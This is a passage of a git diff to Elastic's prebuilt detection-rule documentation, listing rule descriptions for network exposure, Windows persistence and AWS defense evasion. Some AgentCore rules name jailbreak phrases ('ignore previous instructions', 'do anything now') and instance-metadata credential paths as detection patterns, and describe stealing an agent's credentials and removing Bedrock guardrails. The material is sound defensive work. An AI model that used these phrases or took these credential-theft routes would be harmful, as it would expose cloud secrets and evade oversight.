network events that may indicate the use of VNC traffic from the Internet. VNC is commonly used by system administrators to remotely control a system for maintenance or to use shared resources. It should almost never be directly exposed to the Internet, as it is frequently targeted and exploited by threat actors as an initial access or backdoor vector. | update | 113 + +|<> | This rule detects network events that may indicate the use of VNC traffic to the Internet. VNC is commonly used by system administrators to remotely control a system for maintenance or to use shared resources. It should almost never be directly exposed to the Internet, as it is frequently targeted and exploited by threat actors as an initial access or backdoor vector. | update | 113 + +|<> | This rule detects network events that may indicate the use of RPC traffic from the Internet. RPC is commonly used by system administrators to remotely control a system for maintenance or to use shared resources. It should almost never be directly exposed to the Internet, as it is frequently targeted and exploited by threat actors as an initial access or backdoor vector. | update | 113 + +|<> | This rule detects network events that may indicate the use of RPC traffic to the Internet. RPC is commonly used by system administrators to remotely control a system for maintenance or to use shared resources. It should almost never be directly exposed to the Internet, as it is frequently targeted and exploited by threat actors as an initial access or backdoor vector. | update | 112 + +|<> | This rule detects network events that may indicate inbound Windows file sharing (SMB or CIFS) traffic originating from the Internet. SMB should never be directly reachable from the Internet, as it is a primary target for exploitation by threat actors seeking initial access. Inbound SMB from a public IP is a direct precondition for attacks such as EternalBlue (MS17-010) and related SMB remote code execution vulnerabilities. | update | 2 + +|<> | This rule detects network events that may indicate the use of Windows file sharing (also called SMB or CIFS) traffic to the Internet. SMB is commonly used within networks to share files, printers, and other system resources amongst trusted systems. It should almost never be directly exposed to the Internet, as it is frequently targeted and exploited by threat actors as an initial access or backdoor vector or for data exfiltration. | update | 113 + +|<> | Identifies potential relay activities against a Computer account by identifying authentication events using the computer account coming from from hosts other than the server that owns the account. Attackers may relay the computer account hash after capturing it using forced authentication. | update | 113 + +|<> | Identifies rare connection attempts to a Web Distributed Authoring and Versioning (WebDAV) resource. Attackers may inject WebDAV paths in files or features opened by a victim user to leak their NTLM credentials via forced authentication. | update | 11 + +|<> | Identifies suspicious instances of default system32 DLLs either unsigned or signed with non-MS certificates. This can potentially indicate the attempt to masquerade as system DLLs, perform DLL Search Order Hijacking or backdoor and resign legitimate DLLs. | update | 112 + +|<> | Identifies the modification of a file creation time for executable files in sensitive system directories. Adversaries may modify file time attributes to blend malicious executables with legitimate system files. Timestomping is a technique that modifies the timestamps of a file often to mimic files that are in trusted directories. | update | 112 + +|<> | Identifies the installation of custom Application Compatibility Shim databases. This Windows functionality has been abused by attackers to stealthily gain persistence and arbitrary code execution in legitimate Windows processes. | update | 316 + +|<> | The Application Shim was created to allow for backward compatibility of software as the operating system codebase changes over time. This Windows functionality has been abused by attackers to stealthily gain persistence and arbitrary code execution in legitimate Windows processes. | update | 320 + +|<> | Identifies the creation of ASPX/ASHX/ASMX files in specific directories that are commonly targeted by attackers to deploy web shells. | update | 5 + +|<> | The malware known as SUNBURST targets the SolarWind's Orion business software for command and control. This rule detects post-exploitation command and control activity of the SUNBURST backdoor. | deprecated | 113 + +|<> | Detects creation of a GKE service account token through the TokenRequest API by a non-system identity. TokenRequest allows programmatic minting of short-lived tokens for any service account the caller can create tokens for, without reading a mounted projected token from disk. Attackers with initial cluster access can abuse this API to obtain tokens for more privileged service accounts, pivot via Workload Identity to GCP APIs, or retain access after pod termination. Unlike filesystem token theft, TokenRequest activity is visible only in Kubernetes audit logs as create against the serviceaccounts/token subresource. | deprecated | 2 + +|<> | Identifies registry write modifications to hide an encoded portable executable. This could be indicative of adversary defense evasion by avoiding the storing of malicious content directly on disk. | deprecated | 420 + +|<> | Identifies scripts that contain patterns and known methods that obfuscate PowerShell code. Attackers can use obfuscation techniques to bypass PowerShell security protections such as Antimalware Scan Interface (AMSI). | deprecated | 111 + +|<> | This rule detects when a service account makes an unauthorized request for resources from the API server via an unusual user agent. Service accounts follow a very predictable pattern of behavior. A service account should never send an unauthorized request to the API server. This behavior is likely an indicator of compromise or of a problem within the cluster. An adversary may have gained access to credentials/tokens and this could be an attempt to access or create resources to facilitate further movement or execution within the cluster. | deprecated | 13 + +|<> | This rule detects unusual request responses in Kubernetes audit logs through the use of the "new_terms" rule type. In production environments, default API requests are typically made by system components or trusted users, who are expected to have a consistent user agent and allowed response annotations. By monitoring for anomalies in the username and response annotations, this rule helps identify potential unauthorized access or misconfigurations in the Kubernetes environment. | deprecated | 7 + +|<> | Detects the occurrence of emails reported as Phishing or Malware by Users. Security Awareness training is essential to stay ahead of scammers and threat actors, as security products can be bypassed, and the user can still receive a malicious message. Educating users to report suspicious messages can help identify gaps in security controls and prevent malware infections and Business Email Compromise attacks. | deprecated | 214 + +|<> | Detects writing executable files that will be automatically launched by Adobe on launch. | deprecated | 422 + +|<> | Detects when multi-factor authentication (MFA) is disabled for a Google Workspace organization. An adversary may attempt to modify a password policy in order to weaken an organization’s security controls. | deprecated | 213 + +|<> | Detects attempts to exploit privilege escalation vulnerabilities related to the Print Spooler service. For more information refer to the following CVE's - CVE-2020-1048, CVE-2020-1337 and CVE-2020-1300 and verify that the impacted system is patched. | deprecated | 324 + +|============================================== diff --git a/docs/detections/prebuilt-rules/prebuilt-rules-downloadable-updates.asciidoc b/docs/detections/prebuilt-rules/prebuilt-rules-downloadable-updates.asciidoc index f7d2a50f06..4646827d7c 100644 --- a/docs/detections/prebuilt-rules/prebuilt-rules-downloadable-updates.asciidoc +++ b/docs/detections/prebuilt-rules/prebuilt-rules-downloadable-updates.asciidoc @@ -13,6 +13,10 @@ For previous rule updates, please navigate to the https://www.elastic.co/guide/e |Update version |Date | New rules | Updated rules | Notes +|<> | 01 Sep 2026 | 24 | 94 | +This release includes new rules for Linux, AWS, Windows, macOS, GCP, Network Traffic, and SonicWall. New rules for Linux include detection for execution, discovery, defense evasion, initial access, and persistence. New rules for AWS include detection for credential access, defense evasion, persistence, privilege escalation, and resource development. New rules for Windows include detection for initial access and defense evasion. New rules for macOS include detection for persistence, execution, defense evasion, and initial access. New rules for GCP include detection for discovery. New rules for Network Traffic include detection for command and control and initial access. New rules for SonicWall include detection for initial access. Additionally, significant tuning for Linux, Windows, macOS, AWS, Azure, Kubernetes, and network rules improves efficacy and performance. + + |<> | 18 Aug 2026 | 3 | 1 | This release includes new rules for Windows and GCP. New rules for Windows include detection for credential access. New rules for GCP include detection for persistence. Additionally, significant tuning for Azure, Linux, Windows, and macOS rules improves efficacy and performance. @@ -168,3 +172,4 @@ include::downloadable-packages/8-19-28/prebuilt-rules-8-19-28-summary.asciidoc[l include::downloadable-packages/8-19-29/prebuilt-rules-8-19-29-summary.asciidoc[leveloffset=+1] include::downloadable-packages/8-19-30/prebuilt-rules-8-19-30-summary.asciidoc[leveloffset=+1] include::downloadable-packages/8-19-31/prebuilt-rules-8-19-31-summary.asciidoc[leveloffset=+1] +include::downloadable-packages/8-19-32/prebuilt-rules-8-19-32-summary.asciidoc[leveloffset=+1] diff --git a/docs/detections/prebuilt-rules/prebuilt-rules-reference.asciidoc b/docs/detections/prebuilt-rules/prebuilt-rules-reference.asciidoc index adc59ff99b..f7d66c48f2 100644 --- a/docs/detections/prebuilt-rules/prebuilt-rules-reference.asciidoc +++ b/docs/detections/prebuilt-rules/prebuilt-rules-reference.asciidoc @@ -44,6 +44,8 @@ and their rule type is `machine_learning`. |<> |Identifies an Amazon Bedrock AgentCore execution role (an AssumedRole identity whose role name begins with "AgentCore-" or contains "BedrockAgentCore") making an AWS API call to a service it has not previously called. AgentCore runtimes normally interact only with Bedrock inference, AgentCore data-plane, and observability services (CloudWatch Logs, X-Ray, CloudWatch metrics), so an execution role suddenly calling STS, EC2, IAM, Secrets Manager, or other services is a strong indicator that the role's temporary credentials were exfiltrated from the agent's microVM (for example, via the Code Interpreter instance-metadata-service credential theft) and are being used outside the runtime for reconnaissance, privilege escalation, or lateral movement. Because the stolen credentials are recorded in CloudTrail under the execution role's own identity, the anomalous service usage, not the identity, is the detectable signal. |[Domain: Cloud], [Data Source: AWS], [Data Source: AWS CloudTrail], [Data Source: Amazon Web Services], [Data Source: Amazon Bedrock], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Tactic: Credential Access], [Resources: Investigation Guide] |None |1 +|<> |Detects the creation of an AWS Bedrock AgentCore resource (code interpreter, agent runtime, browser, or harness) with an IAM execution role attached. When an attacker with iam:PassRole permission creates an AgentCore resource and attaches a privileged role, subsequent invocations inside that resource execute as the attached role — enabling privilege escalation to roles that trust bedrock-agentcore.amazonaws.com. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Platform: AWS], [Data Source: AWS CloudTrail], [Service: AWS Bedrock], [Service: AWS IAM], [Tactic: Privilege Escalation], [Tactic: Persistence], [Rule Type: Custom Query (KQL)], [Resources: Investigation Guide] |None |1 + |<> |Identifies prompts sent to an Amazon Bedrock AgentCore runtime that contain AWS access key identifiers (AKIA long-term or ASIA temporary/STS), Amazon Bedrock API keys (ABSK bearer tokens), or PEM-encoded private keys. The runtime application logs record the caller-supplied prompt; credentials embedded in a prompt are exposed to the model provider, persisted in observability logs, and may be returned in completions or used by downstream tools. This commonly indicates accidental secret leakage by a user or application, or an attempt to stage credentials for misuse through the agent. Secrets should never be passed to an agent in clear text. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Data Source: Amazon Bedrock], [Use Case: Threat Detection], [Tactic: Credential Access], [Resources: Investigation Guide] |None |1 |<> |Identifies prompts sent to an Amazon Bedrock AgentCore runtime that attempt to harvest credentials or coerce the agent into exfiltrating data. The runtime application logs capture the caller-supplied prompt; this rule flags prompts that reference the cloud instance metadata service (169.254.169.254, the ECS task metadata address, or the "latest/meta-data" / "security-credentials" paths), prompts that name AWS access or secret keys directly, and prompt-injection or jailbreak language ("ignore previous instructions", "developer mode", "do anything now") combined with intent to reveal secrets, system prompts, or send data to an external endpoint. Asking an agent to read instance metadata credentials or to exfiltrate secrets is rarely legitimate and indicates an attempt to weaponize the agent for credential theft, even when the model refuses the request. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Data Source: Amazon Bedrock], [Use Case: Threat Detection], [Tactic: Credential Access], [Resources: Investigation Guide] |None |1 @@ -58,7 +60,7 @@ and their rule type is `machine_learning`. |<> |Detects when an AWS principal using long-term IAM user credentials (AKIA* access key) enumerates available Bedrock foundation models and then invokes a model within the same 15-minute window. Most legitimate Bedrock workloads run under IAM roles with short-lived credentials; the combination of model enumeration followed by direct model invocation from a long-term IAM user key is unusual in production environments and consistent with an adversary using stolen credentials to discover and exploit available AI model capabilities. This pattern is associated with LLMjacking attacks where threat actors abuse compromised cloud credentials to run high-volume or high-cost model inference at the account owner's expense. |[Domain: Cloud], [Domain: LLM], [Data Source: Amazon Web Services], [Data Source: AWS], [Data Source: AWS CloudTrail], [Use Case: Identity and Access Audit], [Resources: Investigation Guide], [Tactic: Discovery], [Tactic: Initial Access] |None |1 -|<> |Detects deletion, weakening, or version management of AWS Bedrock guardrails via the DeleteGuardrail, UpdateGuardrail, DeleteEnforcedGuardrailConfiguration, or PutEnforcedGuardrailConfiguration APIs. Bedrock guardrails enforce content, topic, word, and sensitive-information policies on model invocations. Deleting a guardrail, loosening its policies, removing or overwriting the organization-enforced guardrail configuration, or creating a new version to enforce a weakened configuration allows an adversary to bypass these protections — the cloud control-plane equivalent of disabling a security tool. This activity should be validated against approved change management and the responsible identity. |[Domain: Cloud], [Domain: LLM], [Data Source: AWS], [Data Source: AWS CloudTrail], [Data Source: Amazon Web Services], [Data Source: Amazon Bedrock], [Use Case: Threat Detection], [Resources: Investigation Guide], [Tactic: Defense Evasion] |None |1 +|<> |Detects deletion, weakening, or version management of AWS Bedrock guardrails via the DeleteGuardrail, UpdateGuardrail, DeleteEnforcedGuardrailConfiguration, or PutEnforcedGuardrailConfiguration APIs. Bedrock guardrails enforce content, topic, word, and sensitive-information policies on model invocations. Deleting a guardrail, loosening its policies, removing or overwriting the organization-enforced guardrail configuration, or creating a new version to enforce a weakened configuration allows an adversary to bypass these protections — the cloud control-plane equivalent of disabling a security tool. This activity should be validated against approved change management and the responsible identity. |[Domain: Cloud], [Domain: GenAI], [Platform: AWS], [Data Source: AWS CloudTrail], [Service: AWS Bedrock], [Tactic: Defense Evasion], [Rule Type: Custom Query (KQL)], [Resources: Investigation Guide] |None |2 |<> |Identifies multiple violations of AWS Bedrock guardrails within a single request, resulting in a block action, increasing the likelihood of malicious intent. Multiple violations implies that a user may be intentionally attempting to cirvumvent security controls, access sensitive information, or possibly exploit a vulnerability in the system. |[Domain: LLM], [Data Source: AWS Bedrock], [Data Source: AWS S3], [Resources: Investigation Guide], [Use Case: Policy Violation], [Mitre Atlas: T0051], [Mitre Atlas: T0054] |None |8 @@ -100,19 +102,19 @@ and their rule type is `machine_learning`. |<> |Detects Cloudtrail logging suspension via StopLogging API. Stopping CloudTrail eliminates forward audit visibility and is a classic defense evasion step before sensitive changes or data theft. Investigate immediately and determine what occurred during the logging gap. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Data Source: AWS Cloudtrail], [Use Case: Log Auditing], [Resources: Investigation Guide], [Tactic: Defense Evasion] |None |216 -|<> |Detects updates to an existing CloudTrail trail via UpdateTrail API which may reduce visibility, change destinations, or weaken integrity (e.g., removing global events, moving the S3 destination, or disabling validation). Adversaries can modify trails to evade detection while maintaining a semblance of logging. Validate any configuration change against approved baselines. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Data Source: AWS Cloudtrail], [Use Case: Log Auditing], [Resources: Investigation Guide], [Tactic: Impact] |None |216 +|<> |Detects updates to an existing CloudTrail trail via UpdateTrail API which may reduce visibility, change destinations, or weaken integrity (e.g., removing global events, moving the S3 destination, or disabling validation). Adversaries can modify trails to evade detection while maintaining a semblance of logging. Validate any configuration change against approved baselines. |[Domain: Cloud], [Platform: AWS], [Data Source: AWS CloudTrail], [Tactic: Impact], [Rule Type: Custom Query (KQL)], [Resources: Investigation Guide] |None |217 |<> |Detects CloudTrail PutEventSelectors calls where the legacy event selectors explicitly set includeManagementEvents to false, disabling capture of all management API calls for that trail. Unlike StopLogging or DeleteTrail — which leave an obvious trace of the trail being stopped or removed entirely — this technique leaves the trail appearing active and healthy in the console while silently blinding defenders to subsequent IAM changes, credential operations, and resource abuse. This technique is documented in Stratus Red Team as aws.defense-evasion.cloudtrail-event-selectors and is a known pre-exfiltration step. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Data Source: AWS CloudTrail], [Use Case: Log Auditing], [Tactic: Defense Evasion], [Resources: Investigation Guide] |None |1 -|<> |Detects the deletion of one or more Amazon CloudWatch alarms using the "DeleteAlarms" API. CloudWatch alarms are critical for monitoring metrics and triggering alerts when thresholds are exceeded. An adversary may delete alarms to impair visibility, silence alerts, and evade detection following malicious activity. This behavior may occur during post-exploitation or cleanup phases to remove traces of compromise or disable automated responses. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Data Source: Amazon CloudWatch], [Resources: Investigation Guide], [Tactic: Defense Evasion] |None |214 +|<> |Detects the deletion of one or more Amazon CloudWatch alarms using the "DeleteAlarms" API. CloudWatch alarms are critical for monitoring metrics and triggering alerts when thresholds are exceeded. An adversary may delete alarms to impair visibility, silence alerts, and evade detection following malicious activity. This behavior may occur during post-exploitation or cleanup phases to remove traces of compromise or disable automated responses. |[Domain: Cloud], [Platform: AWS], [Data Source: AWS CloudTrail], [Service: AWS CloudWatch], [Tactic: Defense Evasion], [Rule Type: Custom Query (KQL)], [Resources: Investigation Guide] |None |215 -|<> |Detects the deletion of an Amazon CloudWatch Log Group using the "DeleteLogGroup" API. CloudWatch log groups store operational and security logs for AWS services and custom applications. Deleting a log group permanently removes all associated log streams and historical log data, which can eliminate forensic evidence and disrupt security monitoring pipelines. Adversaries may delete log groups to conceal malicious activity, disable log forwarding, or impede incident response. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Data Source: Amazon CloudWatch], [Use Case: Log Auditing], [Resources: Investigation Guide], [Tactic: Defense Evasion], [Tactic: Impact] |None |215 +|<> |Detects the deletion of an Amazon CloudWatch Log Group using the "DeleteLogGroup" API. CloudWatch log groups store operational and security logs for AWS services and custom applications. Deleting a log group permanently removes all associated log streams and historical log data, which can eliminate forensic evidence and disrupt security monitoring pipelines. Adversaries may delete log groups to conceal malicious activity, disable log forwarding, or impede incident response. |[Domain: Cloud], [Platform: AWS], [Data Source: AWS CloudTrail], [Service: AWS CloudWatch], [Tactic: Defense Evasion], [Tactic: Impact], [Rule Type: Custom Query (KQL)], [Resources: Investigation Guide] |None |216 -|<> |Detects the deletion of an Amazon CloudWatch log stream using the "DeleteLogStream" API. Deleting a log stream permanently removes its associated log events and may disrupt security visibility, break audit trails, or suppress forensic evidence. Adversaries may delete log streams to conceal malicious actions, impair monitoring pipelines, or remove artifacts generated during post-exploitation activity. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Data Source: Amazon CloudWatch], [Use Case: Log Auditing], [Tactic: Defense Evasion], [Tactic: Impact], [Resources: Investigation Guide] |None |215 +|<> |Detects the deletion of an Amazon CloudWatch log stream using the "DeleteLogStream" API. Deleting a log stream permanently removes its associated log events and may disrupt security visibility, break audit trails, or suppress forensic evidence. Adversaries may delete log streams to conceal malicious actions, impair monitoring pipelines, or remove artifacts generated during post-exploitation activity. |[Domain: Cloud], [Platform: AWS], [Data Source: AWS CloudTrail], [Service: AWS CloudWatch], [Tactic: Defense Evasion], [Tactic: Impact], [Rule Type: Custom Query (KQL)], [Resources: Investigation Guide] |None |216 |<> |Identifies AWS CloudTrail data events where an unauthenticated identity successfully retrieves temporary AWS credentials from a Cognito Identity Pool via GetCredentialsForIdentity. Cognito Identity Pools can be configured to allow unauthenticated (guest) access, intended for scenarios like anonymous app analytics, but a pool that grants those anonymous identities meaningful IAM permissions becomes a public, unauthenticated path to real AWS credentials. Adversaries who discover an identity pool ID (often embedded in mobile app binaries, web app JavaScript, or public source repositories) can call GetId followed by GetCredentialsForIdentity with no login token at all to obtain temporary credentials, then use them to access whatever the pool's unauthenticated role permits. This is a New Terms rule that limits alerting to identity pools that have not been observed issuing credentials to an unauthenticated caller before, since some applications intentionally and continuously use guest access as part of normal operation. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Data Source: AWS Cognito], [Use Case: Asset Visibility], [Resources: Investigation Guide], [Tactic: Credential Access], [Tactic: Initial Access] |None |1 -|<> |Identifies attempts to delete AWS Config resources. AWS Config provides continuous visibility into resource configuration changes and compliance posture across an account. Deleting Config components can significantly reduce security visibility and auditability. Adversaries may delete or disable Config resources to evade detection, hide prior activity, or weaken governance controls before or after other malicious actions. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Data Source: AWS Config], [Resources: Investigation Guide], [Tactic: Defense Evasion] |None |214 +|<> |Identifies attempts to delete AWS Config resources. AWS Config provides continuous visibility into resource configuration changes and compliance posture across an account. Deleting Config components can significantly reduce security visibility and auditability. Adversaries may delete or disable Config resources to evade detection, hide prior activity, or weaken governance controls before or after other malicious actions. |[Domain: Cloud], [Platform: AWS], [Data Source: AWS CloudTrail], [Service: AWS Config], [Tactic: Defense Evasion], [Rule Type: Custom Query (KQL)], [Resources: Investigation Guide] |None |215 |<> |Identifies when an AWS Config configuration recorder is stopped. AWS Config recorders continuously track and record configuration changes across supported AWS resources. Stopping the recorder immediately reduces visibility into infrastructure changes and can be abused by adversaries to evade detection, obscure follow-on activity, or weaken compliance and security monitoring controls. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Data Source: AWS Config], [Tactic: Defense Evasion], [Resources: Investigation Guide] |None |212 @@ -120,6 +122,8 @@ and their rule type is `machine_learning`. |<> |Detects AWS access keys that are used from both GitHub Actions CI/CD infrastructure and non-CI/CD infrastructure. This pattern indicates potential credential theft where an attacker who has stolen AWS credentials configured as GitHub Actions secrets and is using them from their own infrastructure. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Data Source: AWS CloudTrail], [Data Source: AWS IAM], [Use Case: Threat Detection], [Tactic: Initial Access], [Tactic: Lateral Movement], [Resources: Investigation Guide] |None |1 +|<> |Detects the deletion of an Amazon Detective behavior graph via the DeleteGraph API. Amazon Detective automatically collects log data from AWS services and uses machine learning, statistical analysis, and graph theory to build an interactive model of resource behaviors and interactions. Deleting a behavior graph destroys its historical analysis data and removes the ability to investigate security incidents using Detective's relationship mapping. An attacker with sufficient IAM permissions may delete the Detective graph to impair forensic investigation of a compromise. |[Domain: Cloud], [Platform: AWS], [Data Source: AWS CloudTrail], [Service: AWS Detective], [Rule Type: Custom Query (KQL)], [Tactic: Defense Evasion], [Resources: Investigation Guide] |None |1 + |<> |Flags the first time a given IAM principal invokes a narrow set of high-signal discovery APIs (credential check, account and IAM enumeration, bucket and compute inventory, logging introspection) from a source IP whose autonomous system number (ASN) matches a curated set commonly associated with consumer VPN brands, VPN-heavy hosting, and provider networks referenced in public reporting on TeamPCP activity (for example 31173 Services AB AS39351 and Oy Crea Nova Hosting Solution Ltd). Broad `List*`/`Describe*` patterns are intentionally omitted to reduce noise. Hosting ASNs are heavily dual-use; validate `source.as.number` in your data and extend `event.action` only when your baseline allows it. |[Domain: Cloud], [Domain: Identity], [Data Source: AWS], [Data Source: Amazon Web Services], [Data Source: AWS CloudTrail], [Use Case: Threat Detection], [Tactic: Discovery], [Resources: Investigation Guide] |None |2 |<> |Detects when a single AWS resource is running multiple read-only, discovery API calls in a 10-second window. This behavior could indicate an actor attempting to discover the AWS infrastructure using compromised credentials or a compromised instance. Adversaries may use this information to identify potential targets for further exploitation or to gain a better understanding of the target's infrastructure. |[Domain: Cloud], [Data Source: AWS], [Data Source: AWS EC2], [Data Source: AWS IAM], [Data Source: AWS S3], [Data Source: AWS Cloudtrail], [Data Source: AWS RDS], [Data Source: AWS Lambda], [Data Source: AWS STS], [Data Source: AWS KMS], [Data Source: AWS SES], [Data Source: AWS Cloudfront], [Data Source: AWS DynamoDB], [Data Source: AWS Elastic Load Balancing], [Use Case: Threat Detection], [Tactic: Discovery], [Resources: Investigation Guide] |None |10 @@ -128,17 +132,17 @@ and their rule type is `machine_learning`. |<> |Identifies when an AWS DynamoDB table is exported to S3. Adversaries may use the ExportTableToPointInTime operation to collect sensitive information or exfiltrate data from DynamoDB tables. This rule detects unusual user activity by monitoring for the ExportTableToPointInTime action in CloudTrail logs. This is a New Terms rule that only flags when this behavior is observed by a user or role for the first time. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Data Source: AWS DynamoDB], [Resources: Investigation Guide], [Use Case: Threat Detection], [Tactic: Exfiltration] |None |8 -|<> |Identifies an AWS Amazon Machine Image (AMI) being shared with another AWS account. Adversaries with access may share an AMI with an external AWS account as a means of data exfiltration. AMIs can contain secrets, bash histories, code artifacts, and other sensitive data that adversaries may abuse if shared with unauthorized accounts. AMIs can be made publicly available accidentally as well. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Data Source: AWS EC2], [Use Case: Threat Detection], [Tactic: Exfiltration], [Resources: Investigation Guide] |None |8 +|<> |Identifies an AWS Amazon Machine Image (AMI) being shared with another AWS account. Adversaries with access may share an AMI with an external AWS account as a means of data exfiltration. AMIs can contain secrets, bash histories, code artifacts, and other sensitive data that adversaries may abuse if shared with unauthorized accounts. AMIs can be made publicly available accidentally as well. |[Domain: Cloud], [Platform: AWS], [Data Source: AWS CloudTrail], [Service: AWS EC2], [Tactic: Exfiltration], [Rule Type: Custom Query (KQL)], [Resources: Investigation Guide] |None |9 |<> |Identifies the first time a given IAM principal successfully creates an EC2 key pair when the request is sourced from a network whose autonomous system organization is not attributed to common cloud or hyperscaler providers in your GeoIP data. Adversaries may call CreateKeyPair to stage SSH access material before launching or accessing instances. A new terms baseline on `user_identity.arn` suppresses repeated noise from the same principal while still surfacing the initial suspicious creation from an unusual egress label. |[Domain: Cloud], [Domain: Identity], [Data Source: AWS], [Data Source: Amazon Web Services], [Data Source: Amazon EC2], [Use Case: Threat Detection], [Tactic: Persistence], [Tactic: Credential Access], [Tactic: Lateral Movement], [Resources: Investigation Guide] |None |2 |<> |Identifies when a user has queried for deprecated Amazon Machine Images (AMIs) in AWS. This may indicate an adversary looking for outdated AMIs that may be vulnerable to exploitation. While deprecated AMIs are not inherently malicious or indicative of a breach, they may be more susceptible to vulnerabilities and should be investigated for potential security risks. |[Domain: Cloud], [Data Source: AWS], [Data Source: AWS EC2], [Resources: Investigation Guide], [Use Case: Threat Detection], [Tactic: Discovery] |None |8 -|<> |Identifies the removal of access permissions from a shared AWS EC2 EBS snapshot. EBS snapshots are essential for data retention and disaster recovery. Adversaries may revoke or modify snapshot permissions to prevent legitimate users from accessing backups, thereby obstructing recovery efforts after data loss or destructive actions. This tactic can also be used to evade detection or maintain exclusive access to critical backups, ultimately increasing the impact of an attack and complicating incident response. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Data Source: AWS EC2], [Use Case: Threat Detection], [Tactic: Impact], [Resources: Investigation Guide] |None |7 +|<> |Identifies the removal of access permissions from a shared AWS EC2 EBS snapshot. EBS snapshots are essential for data retention and disaster recovery. Adversaries may revoke or modify snapshot permissions to prevent legitimate users from accessing backups, thereby obstructing recovery efforts after data loss or destructive actions. This tactic can also be used to evade detection or maintain exclusive access to critical backups, ultimately increasing the impact of an attack and complicating incident response. |[Domain: Cloud], [Platform: AWS], [Data Source: AWS CloudTrail], [Service: AWS EC2], [Tactic: Impact], [Rule Type: Event Correlation (EQL)], [Resources: Investigation Guide] |None |8 |<> |Detects when an Amazon Elastic Block Store (EBS) snapshot is shared with another AWS account or made public. EBS snapshots contain copies of data volumes that may include sensitive or regulated information. Adversaries may exploit ModifySnapshotAttribute to share snapshots with external accounts or the public, allowing them to copy and access data in an environment they control. This activity often precedes data exfiltration or persistence operations, where the attacker transfers stolen data out of the victim account or prepares a staging area for further exploitation. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Data Source: AWS EC2], [Use Case: Threat Detection], [Tactic: Exfiltration], [Resources: Investigation Guide] |None |10 -|<> |Detects when Amazon Elastic Block Store (EBS) encryption by default is disabled in an AWS region. EBS encryption ensures that newly created volumes and snapshots are automatically protected with AWS Key Management Service (KMS) keys. Disabling this setting introduces significant risk as all future volumes created in that region will be unencrypted by default, potentially exposing sensitive data at rest. Adversaries may disable encryption to weaken data protection before exfiltrating or tampering with EBS volumes or snapshots. This may be a step in preparation for data theft or ransomware-style attacks that depend on unencrypted volumes. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Data Source: AWS EC2], [Tactic: Impact], [Resources: Investigation Guide] |None |213 +|<> |Detects when Amazon Elastic Block Store (EBS) encryption by default is disabled in an AWS region. EBS encryption ensures that newly created volumes and snapshots are automatically protected with AWS Key Management Service (KMS) keys. Disabling this setting introduces significant risk as all future volumes created in that region will be unencrypted by default, potentially exposing sensitive data at rest. Adversaries may disable encryption to weaken data protection before exfiltrating or tampering with EBS volumes or snapshots. This may be a step in preparation for data theft or ransomware-style attacks that depend on unencrypted volumes. |[Domain: Cloud], [Platform: AWS], [Data Source: AWS CloudTrail], [Service: AWS EC2], [Tactic: Impact], [Rule Type: Custom Query (KQL)], [Resources: Investigation Guide] |None |214 |<> |Identifies successful export tasks of EC2 instances via the APIs CreateInstanceExportTask, ExportImage, or CreateStoreImageTask. These exports can be used by administrators for legitimate VM migration or backup workflows however, an attacker with access to an EC2 instance or AWS credentials can export a VM or its image and then transfer it off-account for exfiltration of data. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Data Source: AWS EC2], [Use Case: Asset Visibility], [Tactic: Exfiltration], [Tactic: Collection], [Resources: Investigation Guide] |None |4 @@ -148,7 +152,7 @@ and their rule type is `machine_learning`. |<> |Detects successful AWS Management Console or federation login activity performed using an EC2 instance’s assumed role credentials. EC2 instances typically use temporary credentials to make API calls, not to authenticate interactively via the console. A successful "ConsoleLogin" or "GetSigninToken" event using a session pattern that includes "i-" (the EC2 instance ID) is highly anomalous and may indicate that an adversary obtained the instance’s temporary credentials from the instance metadata service (IMDS) and used them to access the console. Such activity can enable lateral movement, privilege escalation, or persistence within the AWS account. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Data Source: AWS EC2], [Data Source: AWS STS], [Data Source: AWS Sign-In], [Use Case: Identity and Access Audit], [Tactic: Lateral Movement], [Tactic: Credential Access], [Tactic: Persistence], [Resources: Investigation Guide] |None |8 -|<> |Identifies when an EC2 instance interacts with the AWS IAM service via an assumed role. This is uncommon behavior and could indicate an attacker using compromised credentials to further exploit an environment. For example, an assumed role could be used to create new users for persistence or add permissions for privilege escalation. An EC2 instance assumes a role using their EC2 ID as the session name. This rule looks for the pattern "i-" which is the beginning pattern for assumed role sessions started by an EC2 instance. This is a [building block](https://www.elastic.co/guide/en/security/current/building-block-rule.html) rule and does not generate alerts on its own. It is meant to be used for correlation with other rules to detect suspicious activity. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Data Source: AWS EC2], [Data Source: AWS IAM], [Use Case: Identity and Access Audit], [Tactic: Privilege Escalation], [Tactic: Persistence], [Rule Type: BBR] |None |4 +|<> |Identifies when an EC2 instance interacts with the AWS IAM service via an assumed role. This is uncommon behavior and could indicate an attacker using compromised credentials to further exploit an environment. For example, an assumed role could be used to create new users for persistence or add permissions for privilege escalation. An EC2 instance assumes a role using their EC2 ID as the session name. This rule looks for the pattern "i-" which is the beginning pattern for assumed role sessions started by an EC2 instance. This is a [building block](https://www.elastic.co/guide/en/security/current/building-block-rule.html) rule and does not generate alerts on its own. It is meant to be used for correlation with other rules to detect suspicious activity. |[Domain: Cloud], [Platform: AWS], [Data Source: AWS CloudTrail], [Service: AWS EC2], [Service: AWS 